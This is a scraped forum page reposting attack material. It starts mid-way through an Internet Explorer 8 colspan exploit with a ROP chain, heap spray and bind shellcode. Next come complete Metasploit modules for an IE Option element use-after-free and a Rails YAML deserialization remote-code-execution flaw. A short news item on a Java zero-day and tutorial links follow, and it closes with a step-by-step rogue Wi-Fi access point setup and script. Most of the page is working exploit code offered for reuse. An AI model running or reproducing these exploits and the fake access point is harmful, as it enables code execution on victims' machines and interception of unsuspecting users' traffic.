CollectGarbage(); } function heapspray(cbuttonlayout) { CollectGarbage(); var rop = cbuttonlayout + 4161; // RET var rop = rop.toString(16); var rop1 = rop.substring(4,8); var rop2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 11360; // POP EBP var rop = rop.toString(16); var rop3 = rop.substring(4,8); var rop4 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 111675; // XCHG EAX,ESP var rop = rop.toString(16); var rop5 = rop.substring(4,8); var rop6 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12377; // POP EBX var rop = rop.toString(16); var rop7 = rop.substring(4,8); var rop8 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 642768; // POP EDX var rop = rop.toString(16); var rop9 = rop.substring(4,8); var rop10 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12201; // POP ECX --> Changed var rop = rop.toString(16); var rop11 = rop.substring(4,8); var rop12 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5504544; // Writable location var rop = rop.toString(16); var writable1 = rop.substring(4,8); var writable2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12462; // POP EDI var rop = rop.toString(16); var rop13 = rop.substring(4,8); var rop14 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12043; // POP ESI --> changed var rop = rop.toString(16); var rop15 = rop.substring(4,8); var rop16 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 63776; // JMP EAX var rop = rop.toString(16); var jmpeax1 = rop.substring(4,8); var jmpeax2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 85751; // POP EAX var rop = rop.toString(16); var rop17 = rop.substring(4,8); var rop18 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 4936; // VirtualProtect() var rop = rop.toString(16); var vp1 = rop.substring(4,8); var vp2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] var rop = rop.toString(16); var rop19 = rop.substring(4,8); var rop20 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 234657; // PUSHAD var rop = rop.toString(16); var rop21 = rop.substring(4,8); var rop22 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 408958; // PUSH ESP var rop = rop.toString(16); var rop23 = rop.substring(4,8); var rop24 = rop.substring(0,4); // } RET var shellcode = unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP shellcode+= unescape("%u1024%u0000"); // Size 0x00001024 shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX shellcode+= unescape("%u0040%u0000"); // 0x00000040 shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect() shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP shellcode+= unescape("%u9090%u9090"); // crap shellcode+= unescape("%u9090%u9090"); // crap // Bind shellcode on 4444 shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); while (shellcode.length < 100000) shellcode = shellcode + shellcode; var onemeg = shellcode.substr(0, 64*1024/2); for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); } onemeg += shellcode.substr(0, (64*1024/2)-(38/2)); var spray = new Array(); for (i=0; i<100; i++) { spray[i] = onemeg.substr(0, onemeg.length); } } function leak(){ var leak_col = document.getElementById("132"); leak_col.width = "41"; leak_col.span = "19"; } function get_leak() { var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); str_addr = str_addr - 1410704; setTimeout(function(){heapspray(str_addr)}, 200); } function trigger_overflow(){ var evil_col = document.getElementById("132"); evil_col.width = "1178993"; evil_col.span = "44"; } setTimeout(function(){leak()}, 300); setTimeout(function(){get_leak()},700); //setTimeout(function(){heapspray()}, 900); setTimeout(function(){trigger_overflow()}, 1200); </script> </body> </html> Sursa: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
  20. Nytro
    [h=1]Microsoft Internet Explorer Option Element Use-After-Free[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer Option Element Use-After-Free", 'Description' => %q{ This module exploits a vulnerability in Microsoft Internet Explorer. A memory corruption may occur when the Option cache isn't updated properly, which allows other JavaScript methods to access a deleted Option element, and results in code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ivan Fratric', #Initial discovery 'juan vazquez', #Metasploit 'sinn3r' #Metasploit ], 'References' => [ [ 'CVE', '2011-1996' ], [ 'MSB', 'MS11-081' ], [ 'URL', 'http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html' ], [ 'URL', 'http://pastebin.com/YLH725Aj' ] ], 'Payload' => { 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ] ], 'Privileged' => false, 'DisclosureDate' => "Oct 11 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) js = %Q| function heap_spray() { var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate @heap_spray_func = js.sym("heap_spray") end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length) rop_payload << "\xeb\x04" # jmp $+6 rop_payload << [0x77c15ed5].pack("V") # 0x0c0c0c0 # stackpivot => xchg eax, esp # ret rop_payload << code else print_status("Using JRE ROP") rop_payload = generate_rop_payload('java', '') rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length) rop_payload << "\xeb\x08" # jmp $+10 rop_payload << [0x7c348b05].pack("V") # stackpivot => xchg eax, esp # ret rop_payload << [0x7c348b05].pack("V") # stackpivot => xchg eax, esp # ret rop_payload << code end return rop_payload end def load_exploit_html(my_target, cli) @heap_spray_func = "heap_spray" p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) #var fakeobj = unescape("%u0c0c%u0c0c"); #call to 0c0c0c0c #eax ==> 0c0c0a14 html = %Q| <!DOCTYPE html> <html> <head> <script> #{js} function ivan() { var fakeobj = unescape("%u0a14%u0c0c"); fakeobj += unescape("%u4141%u4141"); while (fakeobj.length <= 0x38/2) fakeobj += unescape("%u4141%u4141"); var formobj, selobj, optobj; selobj = document.getElementById("select1"); formobj = selobj.form; var imgarray = new Array(); for(var j = 0; j < 500; j++) { imgarray.push(document.createElement("img")); } for(var i=0;i<5;i++) { optobj = document.createElement('option'); optobj.text = "test"; selobj.add(optobj); } selobj.innerText = "foo"; for(var i = 0; i < imgarray.length; i++) { imgarray[i].title = fakeobj.substring(0, 0x38 / 2 - 1); } #{@heap_spray_func}(); formobj.reset(); } </script> </head> <body onload='ivan()'> <form method="post"> <select id="select1"> </select> </form> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end Sursa: Microsoft Internet Explorer Option Element Use-After-Free
  21. Nytro
    [h=1]Ruby on Rails XML Processor YAML Deserialization Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails XML Processor YAML Deserialization Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x }, 'Author' => [ 'charlisome', # PoC 'espes', # PoC and Metasploit module 'lian', # Identified the RouteSet::NamedRouteCollection vector 'hdm' # Module merge/conversion/payload work ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-0156'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156'] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 7 2013', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) ], self.class) register_evasion_options( [ OptBool.new('XML::PadElement', [ true, 'Pad the exploit request with randomly generated XML elements', true]) ], self.class) end # # This stub ensures that the payload runs outside of the Rails process # Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first if RUBY_PLATFORM =~ /mswin|mingw|win32/ inp = IO.popen("ruby", "wb") rescue nil if inp inp.write(code) inp.close end else if ! Process.fork() eval(code) rescue nil end end ^.strip.split(/\n/).map{|line| line.strip}.join("\n") end # # Create the YAML document that will be embedded into the XML # def build_yaml_rails2 # Embed the payload with the detached stub code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) yaml = "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n" yaml end # # Create the YAML document that will be embedded into the XML # def build_yaml_rails3 # Embed the payload with the detached stub code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" yaml end # # Create the XML wrapper with any desired evasion # def build_request(v) xml = '' elo = Rex::Text.rand_text_alpha(rand(12)+4) if datastore['XML::PadElement'] xml << "<#{elo}>" 1.upto(rand(1000)+50) do el = Rex::Text.rand_text_alpha(rand(12)+4) tp = ['string', 'integer'][ rand(2) ] xml << "<#{el} type='#{tp}'>" xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) ) xml << "</#{el}>" end end el = Rex::Text.rand_text_alpha(rand(12)+4) xml << "<#{el} type='yaml'>" xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3) xml << "</#{el}>" if datastore['XML::PadElement'] 1.upto(rand(1000)+50) do el = Rex::Text.rand_text_alpha(rand(12)+4) tp = ['string', 'integer'][ rand(2) ] xml << "<#{el} type='#{tp}'>" xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) ) xml << "</#{el}>" end xml << "</#{elo}>" end xml end # # Send the actual request # def exploit print_status("Sending Railsv3 request to #{rhost}:#{rport}...") res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => build_request(3) }, 25) handler print_status("Sending Railsv2 request to #{rhost}:#{rport}...") res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => build_request(2) }, 25) handler end end Sursa: Ruby on Rails XML Processor YAML Deserialization Code Execution
  22. Nytro
    [h=1]Expert Finds Java 1.7 Zero-Day on High-Profile Website[/h] January 10th, 2013, 14:29 GMT · By Eduard Kovacs The security expert known as Kafeine, the curator of the Malware Don’t Need Coffee website, has come across a new Java zero-day. The vulnerability affects the latest Java 1.7 and it has been found on a website that allegedly records hundreds of thousands of hits each day. Experts from AlienVault have analyzed the exploit and they've shown that a malicious Java applet can be used to execute code (in their example, the Calculator application from Windows). “The Java file is highly obfuscated but based on the quick analysis we did the exploit is probably bypassing certain security checks tricking the permissions of certain Java classes as we saw in CVE-2012-4681,” AlienVault’s Jaime Blasco explained. Researchers from Bitdefender are also analyzing the zero-day which, they say, has been integrated into the recently developed Cool exploit kit. While more details of the vulnerability come to light, experts advise users to disable Java and avoid clicking on suspicious links. Sursa: Expert Finds Java 1.7 Zero-Day on High-Profile Website - Softpedia
  23. Nytro
    [h=1]REPT Reverse Engineering[/h]The whole tutorial is about playing with a target and implementing new things into it. The article is not for newbies, you must know how the tools given in this tutorial works. Tutoriale: http://199.201.127.158/index.php?dir=RCE%20Tutorials/REPT%20Reverse%20Engineering%20Techniques/ Via: REPT Reverse Engineering Technqiues No. 1 - rohitab.com - Forums
  24. Nytro
    INTRODUCTION TO ARM LINUX EXPLOITING Metin KAYA kayameti@gmail.com 2013.01.09, 15:30, Istanbul Metin KAYA - Official Web Site [EnderUNIX] http://www.twitter.com/_metinkaya This paper is the Linux version of the document http://www.signalsec.com/publications/arm_exploiting.pdf which mentions exploiting ARM on Windows systems. Thanks Celil ÜNÜVER for inspiring me. The ARM architecture is used in crucial positions; e.g., mobile phones, femtocells, smallcells, SCADA systems, POS machines. Basic knowledge on ARM, GDB, GCC, C, assembly, Python, and some bash commands is necessary to understand what is going on in the document. The host machine is x86 Linux (32 bit 3.5.0 kernel), so an ARM cross compiler [1] is required for target machine which is ARMv7 little-endian Linux (32 bit 2.6.34 kernel). Download: http://packetstorm.foofus.com/papers/general/exploit_arm_linux_en.pdf
  25. Nytro
    Create Wireless Rogue Access Point Description: In this video I will show you how to create a fake Access point. What is the purpose to create this Fake Access Point ? Lets see if you are in a public place you have all wifi attack gadgets, and you setup a fake access point in the public places AP name called “FreeNetOnlyForToday” maybe people will try to connect this AP - Now what can you do ? You can fire a Metasploit on it because all connections belong to you and tons of stuff you can perform. In the next video I will cover how to create a fake AP and get Passwords. Steps : - apt-get install dhcp3-server airmon-ng start wlan0 airbase-ng -e FreeNet -c 11 -v wlan0 ifconfig at0 up ifconfig at0 11.0.0.254 netmask 255.255.255.0 route add -net 11.0.0.0 netmask 255.255.255.0 gw 11.0.0.254 ---- Add Config in dhcp3 ---- Path = /etc/dhcp3/dhcpd.conf ---- Paste it this ----- ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 10.0.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.254; option domain-name-servers 8.8.8.8; range 10.0.0.1 10.0.0.140; } iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 echo "1" > /proc/sys/net/ipv4/ip_forward If you feel boring to type all these commands no problem ? Use this Bash Script. This bash script will automate your whole process. But check all the connection in bash script or you will get an error. Source : - exploit.co.il #!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." airmon-ng stop wlan0 # Change to your wlan interface sleep 5; airmon-ng start wlan0 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e FreeNet -c 11 -v mon0 & # Change essid, channel and interface sleep 5; ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpddhcpd.conf route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 sleep 5; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & sleep 5; echo "1" > /proc/sys/net/ipv4/ip_forward Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Create Wireless Rogue Access Point
×
×
  • Create New...